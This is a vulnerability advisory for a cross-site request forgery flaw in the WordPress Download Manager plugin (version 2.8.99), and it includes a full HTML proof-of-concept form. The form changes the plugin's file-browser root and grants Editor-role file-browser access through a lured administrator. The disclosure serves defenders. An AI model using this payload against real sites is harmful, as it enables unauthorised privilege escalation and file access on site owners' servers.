Abstract
A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin.
OVE ID
OVE-20160722-0005
Tested versions
This issue was successfully tested on WordPress Download Manager version 2.8.99.
Fix
There is currently no fix available.
Introduction
WordPress Download Manager is a Files / Documents Management Plugin and Complete e-Commerce Solution for selling digital products. WordPress Download Manager plugin will help you to manage, track, control file downloads & sell digital products easily from your WordPress site. Use Password Protection, User Roles Protection to control access to your files. And simply setup prices when you need to sell the digital item. User can directly download free items and when item has a price user will have to go through cart & checkout. It has easiest checkout option to give the user better experience in purchasing an item and which always increase the probability of successful completion of an order. As rather than trying to convince customer to buy something, it would be more helpful to think of a cart optimization as an action to remove barrier to that goal.
It was discovered that WordPress Download Manager is vulnerable to Cross-Site Request Forgery.
Details
The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below.
Proof of concept
The proof of concept below gives file browser access to a user with Editor privileges:
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="task" value="wdm_save_settings"/>
<input type="hidden" name="action" value="wdm_settings"/>
<input type="hidden" name="section" value="basic"/>
<input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
<input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a> "/>
<input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
<input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
<input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
<input type="hidden" name="__wpdm_download_speed" value="4096"/>
<input type="hidden" name="__wpdm_download_resume" value="1"/>
<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
<input type="hidden" name="__wpdm_open_in_browser" value="0"/>
<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
<input type="hidden" name="__wpdm_login_url" value=""/>
<input type="hidden" name="__wpdm_register_url" value=""/>
<input type="hidden" name="__wpdm_user_dashboard" value=""/>
<input type="submit"/>
</form>
</body>
</html>